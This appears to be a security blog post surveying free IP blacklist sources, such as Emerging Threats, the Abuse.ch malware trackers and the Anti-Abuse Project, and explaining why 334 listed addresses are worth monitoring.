Emerging Threats is an open source community for collecting Suricata and Snort rules, firewall rules, and other IDS rulesets. The open source community still plays an active role in Internet security, with more than 200,000 active users downloading the ruleset daily.

Other than those three, the following picture illustrates a compilation of data sources of blacklisted IPs with the amount of addresses they provide and the respective site to download the blacklist. Most of them are free for private use.

[Figure: Block Lists]

All these lists contain a sum of 16749 IPs (type = address), of which 95.4% are unique. The number of IPs for Shadowserver is not mentioned because their monitoring service works based on the information that you provide to them about the ASN or CIDR ranges that you own.

Besides that, you can search through these block lists to get valuable information, although this can be time consuming. Nonetheless, online services like the Anti-Abuse Project automatically check IP addresses and domains against 60 real-time blacklists and give you actionable information. For example, if the IP address is listed in more than 10 block lists, it is positively malicious.

Well, after all this text, the name of this blog entry is 334 because, at the moment of writing, this is the number of IP addresses that you should certainly monitor. These 334 IP addresses are the sum of the IP addresses on the lists provided by the Zeus, SpyEye and Palevo trackers from the Abuse.ch repository (+) the RBN (Russian Business Network) Frequent Malware Advertisers list from the Emerging Threats repository.

If you use any of these blacklists, you should update them at reasonable intervals. These blacklists will definitely help you create a list of prohibited events and build procedures for remediating them. Use them as you see fit.
